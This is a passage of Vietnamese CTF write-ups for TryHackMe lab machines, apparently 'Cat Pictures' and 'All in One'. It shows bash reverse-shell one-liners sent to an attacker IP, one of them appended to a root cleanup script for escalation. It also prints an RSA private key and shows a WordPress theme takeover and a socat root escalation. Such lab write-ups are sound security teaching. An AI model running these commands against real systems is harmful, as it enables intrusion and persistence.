Name (10.10.107.28:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> 
ftp> dir
229 Entering Extended Passive Mode (|||60158|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
226 Directory send OK.
ftp> get note.txt /home/kali/note.txt
local: /home/kali/note.txt remote: note.txt
229 Entering Extended Passive Mode (|||53132|)
150 Opening BINARY mode data connection for note.txt (162 bytes).
100% |************************************************|   162      176.96 KiB/s    00:00 ETA
226 Transfer complete.
162 bytes received in 00:00 (0.50 KiB/s)
ftp>

note.txt

┌──(kalikali)-[~]
└─$ cat note.txt 
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is sardinethecat.
- catlover
                    
┌──(kali㉿kali)-[~]
└─$

Sau khi tìm hiểu 1 chút thì tôi biết được port 4420 với service nvm-express hay còn gọi là NVMe là 1 chuẩn giao tiếp cho ổ cứng SSD. Sử dụng netcat để kết nối đến port này

nc 10.10.107.28 4420

┌──(kalikali)-[~]
└─$ nc 10.10.107.28 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted
ls
bin
etc
home
lib
lib64
opt
tmp
usr

Shell này khó dùng quá. Tuy nhiên sau khi tìm kiếm xung quanh 1 lúc thì tôi tìm thấy wget trong thư mục /usr/bin

Điều này có nghĩa là tôi có thể tải lên tệp bằng wget. Vậy thì tôi sẽ tạo 1 file sh chứa RCE và đẩy nó lên machine

┌──(kalikali)-[~]
└─$ echo "bash -i >& /dev/tcp/10.6.0.191/9001 0>&1" > exploit.sh

Tạo local http server

┌──(kalikali)-[~]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Tải file RCE lên máy

wget http://10.6.0.191:8000/exploit.sh
ERROR: could not open HSTS store. HSTS will be disabled.
http://10.6.0.191:8000/exploit.sh
Connecting to 10.6.0.191:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41 [text/x-sh]
Saving to: 'exploit.sh'

     0K                                                       100% 5.61M=0s

Bây giờ thì tạo listener vơi port 9001

nc -lnvp 9001

Trên machine thực hiện chạy file sh vừa tải lên

bash exploit.sh

┌──(kalikali)-[~]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.107.28] 47420
bash: cannot set terminal process group (1839): Inappropriate ioctl for device
bash: no job control in this shell
I have no name!@cat-pictures:/#

SSH

Tôi tìm thấy 1 file runme trong thư mục user /home/catlover. Thử cat nó và tôi nhận ra đấy là 1 file binary. Nhưng nhìn kỹ thì có 1 dòng có thể đọc được.

I have no name!@cat-pictures:/home/catlover# cat runme
cat runme
UU   =x - = 888 XXXDDStd888 Ptd   ddQtdRt=��/lib64/ld-linux-x86-64.so.2GNUGNU��Oy��������?8��GNU▒�▒▒�ems��
                                             C���/��*Fm]S; P , 
......

rebeccaPlease enter yout password: Welcome, catlover! SSH key transfer queued! touch /tmp/gibmethesshkeyAccess Deniedd

......

Điều này có nghĩa là khi nhập đúng password, tôi sẽ nhận được ssh key

Có 1 cái tên rebecca ở phía trước đoạn nhập input. Tôi sẽ thử chạy file này và nhập rebecca

I have no name!@cat-pictures:/home/catlover# ./runme
./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued! 
I have no name!@cat-pictures:/home/catlover# ls -la
ls -la
total 32
drwxr-xr-x 2 0 0  4096 Nov 18 07:24 .
drwxr-xr-x 3 0 0  4096 Apr  2  2021 ..
-rw-r--r-- 1 0 0  1675 Nov 18 07:24 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr  3  2021 runme
I have no name!@cat-pictures:/home/catlover# 
I have no name!@cat-pictures:/home/catlover# cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAmI1dCzfMF4y+TG3QcyaN3B7pLVMzPqQ1fSQ2J9jKzYxWArW5
IWnCNvY8gOZdOSWgDODCj8mOssL7SIIgkOuD1OzM0cMBSCCwYlaN9F8zmz6UJX+k
jSmQqh7eqtXuAvOkadRoFlyog2kZ1Gb72zebR75UCBzCKv1zODRx2zLgFyGu0k2u
xCa4zmBdm80X0gKbk5MTgM4/l8U3DFZgSg45v+2uM3aoqbhSNu/nXRNFyR/Wb10H
tzeTEJeqIrjbAwcOZzPhISo6fuUVNH0pLQOf/9B1ojI3/jhJ+zE6MB0m77iE07cr
lT5PuxlcjbItlEF9tjqudycnFRlGAKG6uU8/8wIDAQABAoIBAH1NyDo5p6tEUN8o
aErdRTKkNTWknHf8m27h+pW6TcKOXeu15o3ad8t7cHEUR0h0bkWFrGo8zbhpzcte
D2/Z85xGsWouufPL3fW4ULuEIziGK1utv7SvioMh/hXmyKymActny+NqUoQ2JSBB
QuhqgWJppE5RiO+U5ToqYccBv+1e2bO9P+agWe+3hpjWtiAUHEdorlJK9D+zpw8s
/+9CjpDzjXA45X2ikZ1AhWNLhPBnH3CpIgug8WIxY9fMbmU8BInA8M4LUvQq5A63
zvWWtuh5bTkj622QQc0Eq1bJ0bfUkQRD33sqRVUUBE9r+YvKxHAOrhkZHsvwWhK/
oylx3WECgYEAyFR+lUqnQs9BwrpS/A0SjbTToOPiCICzdjW9XPOxKy/+8Pvn7gLv
00j5NVv6c0zmHJRCG+wELOVSfRYv7z88V+mJ302Bhf6uuPd9Xu96d8Kr3+iMGoqp
tK7/3m4FjoiNCpZbQw9VHcZvkq1ET6qdzU+1I894YLVu258KeCVUqIMCgYEAwvHy
QTo6VdMOdoINzdcCCcrFCDcswYXxQ5SpI4qMpHniizoa3oQRHO5miPlAKNytw5PQ
zSKoIW47AObP2twzVAH7d+PWRzqAGZXW8gsF6Ls48LxSJGzz8V191PjbcGQO7Oro
Em8pQ+qCISxv3A8fKvG5E9xOspD0/3lsM/zGD9ECgYBOTgDAuFKS4dKRnCUt0qpK
68DBJfJHYo9DiJQBTlwVRoh/h+fLeChoTSDkQ5StFwTnbOg+Y83qAqVwsYiBGxWq
Q2YZ/ADB8KA5OrwtrKwRPe3S8uI4ybS2JKVtO1I+uY9v8P+xQcACiHs6OTH3dfiC
tUJXwhQKsUCo5gzAk874owKBgC/xvTjZjztIWwg+WBLFzFSIMAkjOLinrnyGdUqu
aoSRDWxcb/tF08efwkvxsRvbmki9c97fpSYDrDM+kOQsv9rrWeNUf4CpHJQuS9zf
ZSal1Q0v46vdt+kmqynTwnRTx2/xHf5apHV1mWd7PE+M0IeJR5Fg32H/UKH8ROZM
RpHhAoGAehljGmhge+i0EPtcok8zJe+qpcV2SkLRi7kJZ2LaR97QAmCCsH5SndzR
tDjVbkh5BX0cYtxDnfAF3ErDU15jP8+27pEO5xQNYExxf1y7kxB6Mh9JYJlq0aDt
O4fvFElowV6MXVEMY/04fdnSWavh0D+IkyGRcY5myFHyhWvmFcQ=
-----END RSA PRIVATE KEY-----
I have no name!@cat-pictures:/home/catlover#

Lưu key này về vào login ssh

┌──(kalikali)-[~]
└─$ ssh -i id_rsa catlover@10.10.213.118
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 17 23:29:45 PST 2022

  System load:                    0.41
  Usage of /:                     37.2% of 19.56GB
  Memory usage:                   60%
  Swap usage:                     0%
  Processes:                      100
  Users logged in:                0
  IP address for eth0:            10.10.213.118
  IP address for br-98674f8f20f9: 172.18.0.1
  IP address for docker0:         172.17.0.1


52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/# id
uid=0(root) gid=0(root) groups=0(root)
root@7546fa2336d6:/# ls root/
flag.txt

Privilege escalation

Khi kiểm tra qua các thư mục, tôi nhận ra đây là 1 container chứ không phải 1 machine, vì nó .dockerenv và thư mục gốc cũng giống với docker image

root@7546fa2336d6:/# ls -la
total 108
drwxr-xr-x   1 root root 4096 Mar 25  2021 .
drwxr-xr-x   1 root root 4096 Mar 25  2021 ..
-rw-------   1 root root  588 Jun  4  2021 .bash_history
-rwxr-xr-x   1 root root    0 Mar 25  2021 .dockerenv
drwxr-xr-x   1 root root 4096 Apr  9  2021 bin
drwxr-xr-x   3 root root 4096 Mar 24  2021 bitnami
drwxr-xr-x   2 root root 4096 Jan 30  2021 boot

Thêm 1 điều nữa, bên trong /opt/clean có 1 file clean.sh, file sh này sẽ xóa hết những gì có trong thư mục /tmp, nhưng thực sự thì điều không quan trọng lắm vì tôi chỉ cần thêm RCE vào file sh này để nó tự thực thi.

root@7546fa2336d6:/# echo "bash -i >& /dev/tcp/10.6.0.191/2402 0>&1" >> opt/clean/clean.sh 
root@7546fa2336d6:/# cat opt/clean/clean.sh 
#!/bin/bash

rm -rf /tmp/*
bash -i >& /dev/tcp/10.6.0.191/2402 0>&1
root@7546fa2336d6:/#

Tạo listener với port 2402 và chờ thôi

nc -lnvp 2402

┌──(kalikali)-[~]
└─$ nc -lnvp 2402
listening on [any] 2402 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.213.118] 34968
bash: cannot set terminal process group (2329): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# 
root@cat-pictures:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cat-pictures:~# ls /root
ls /root
firewall
root.txt
root@cat-pictures:~#

Tryhackme - All in One

in CTF on Tryhackme, Web, Linux, Wordpress, SSH, Socat
  1. Reconnaissance
  2. SSH
  3. Privilege escalation

intro

Xin chào, lại là tôi đây. Hôm nay tôi sẽ giải CTF TryHackMe | All in One

Reconnaissance

Vẫn như thông thường, việc đầu tiên cần làm là quét các cổng đang mở trên máy chủ mục tiêu.

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.0.191
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e25c3322765c9366cd969c166ab317a4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLcG2O5LS7paG07xeOB/4E66h0/DIMR/keWMhbTxlA2cfzaDhYknqxCDdYBc9V3+K7iwduXT9jTFTX0C3NIKsVVYcsLxz6eFX3kUyZjnzxxaURPekEQ0BejITQuJRUz9hghT8IjAnQSTPeA+qBIB7AB+bCD39dgyta5laQcrlo0vebY70Y7FMODJlx4YGgnLce6j+PQjE8dz4oiDmrmBd/BBa9FxLj1bGobjB4CX323sEaXLj9XWkSKbc/49zGX7rhLWcUcy23gHwEHVfPdjkCGPr6oiYj5u6OamBuV/A6hFamq27+hQNh8GgiXSgdgGn/8IZFHZQrnh14WmO8xXW5
|   256 1b6a36e18eb4965ec6ef0d91375859b6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Ww9ui4NQDHA5l+lumRpLsAXHYNk4lkghej9obWBlOwnV+tIDw4mgmuO1C3U/WXRgn0GrESAnMpi1DSxy8t1k=
|   256 fbfadbea4eed202b91189d58a06a50ec (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOG6ExdDNH+xAyzd4w1G4E9sCfiiooQhmebQX6nIcH/
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Khi thử truy cập ftp với port 21 bằng user Anonymous, tôi không thu được gì vì trong này trống trơn. Tôi cũng thử put file lên nhưng không có kết quả.

Quay lại với web ở port 80, dùng dirsearch để tìm path ẩn

[03:21:47] 301 -  316B  - /wordpress  ->  http://10.10.248.46/wordpress/   
[03:23:23] 200 -  197B  - /hackathons

Điều này có nghĩa là web được build bằng Wordpress. Tuy nhiên trước đó tôi sẽ vào thử path ẩn còn lại. Xem source web của nó và tôi có 1 đoạn encode

<html>
<body>

<h1>Damn how much I hate the smell of <i>Vinegar </i> :/ !!!  </h1>

<!-- Dvc W@iyur@123 -->
<!-- KeepGoing -->
</body>
</html>

Sử dụng CyberChef với key là KeepGoing

decode

Lưu đoạn text này và quay trở lại với wordpress

wp

Tôi có 1 cái tên ở đây là elyana, cũng có thể là username luôn.

Sử dụng wpscan để khai thác về web này.

┌──(kalikali)-[~]
└─$ wpscan --url http://10.10.68.232/wordpress/ -e vp,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.68.232/wordpress/ [10.10.68.232]
[+] Started: Thu Nov 17 02:31:59 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.68.232/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.68.232/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.68.232/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.68.232/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.68.232/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.68.232/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.68.232/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://10.10.68.232/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://10.10.68.232/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.68.232/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <===============================================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] elyana
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.68.232/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

Từ những thông tin trên, tôi thu được 1 wordpress với phiên bản 5.5.1, nó đang sử dụng theme twentytwenty phiên bản cũ, đây có thể là 1 lưu ý để thực hiện RCE sau khi đã login được vào wordpress.

Tiếp theo là user elyana đúng như tôi dự đoán phía trên. Vậy thì tôi sẽ thử login wordpress với username elyana và pass là đoạn text tôi vừa tìm được

Tôi thành công với elyana - H@ckme@123. Truy cập vào theme twentytwenty và sửa nó với shell php của tôi, thay đổi địa chỉ ip và port bằng địa chỉ máy của tôi và update file.

get shell

Sau đó tạo listener với netcat: nc -lnvp 2402

Truy cập vào link: http://10.10.183.28/wordpress/wp-content/themes/twentytwenty/404.php

┌──(kalikali)-[~]
└─$ nc -lnvp 2402                
listening on [any] 2402 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.183.28] 54774
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 09:00:05 up 26 min,  0 users,  load average: 0.00, 0.02, 0.29
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

SSH

$ cd /home
$ ls
elyana
$ cd /home/elyana
$ ls
hint.txt
user.txt
$ cat user.txt
cat: user.txt: Permission denied
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat hint.txt
Elyana's user password is hidden in the system. Find it ;)
$ 
$ find / -type f -user elyana 2>/dev/null
/home/elyana/user.txt
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght
$

Thử login ssh với user elyana

┌──(kalikali)-[~]
└─$ ssh elyana@10.10.183.28
The authenticity of host '10.10.183.28 (10.10.183.28)' can't be established.
ED25519 key fingerprint is SHA256:Rm7wS3JV0q1IHCuI5dWaanuCoSlTYECCa9jTEE4BFsI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.183.28' (ED25519) to the list of known hosts.
elyana@10.10.183.28's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 17 09:11:29 UTC 2022

  System load:  0.07              Processes:           116
  Usage of /:   53.3% of 6.41GB   Users logged in:     0
  Memory usage: 62%               IP address for eth0: 10.10.183.28
  Swap usage:   0%


16 packages can be updated.
0 updates are security updates.


Last login: Fri Oct  9 08:09:56 2020
-bash-4.4$ id
uid=1000(elyana) gid=1000(elyana) groups=1000(elyana),4(adm),27(sudo),108(lxd)
-bash-4.4$ 
-bash-4.4$ ls 
hint.txt  user.txt
-bash-4.4$

Privilege escalation

sudo -l

-bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:                                                                                                                                              
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                                                                        
                                            
User elyana may run the following commands on elyana:                                                                                                                                        
    (ALL) NOPASSWD: /usr/bin/socat
[socatGTFOBins](https://gtfobins.github.io/gtfobins/socat/)
-bash-4.4$ sudo socat stdin exec:/bin/sh                                                                                                                                                     
id                                                                                                                                                                                           
uid=0(root) gid=0(root) groups=0(root) 
ls /root                                                                                                                                                                                     
root.txt

Pagination

© 2025. All rights reserved.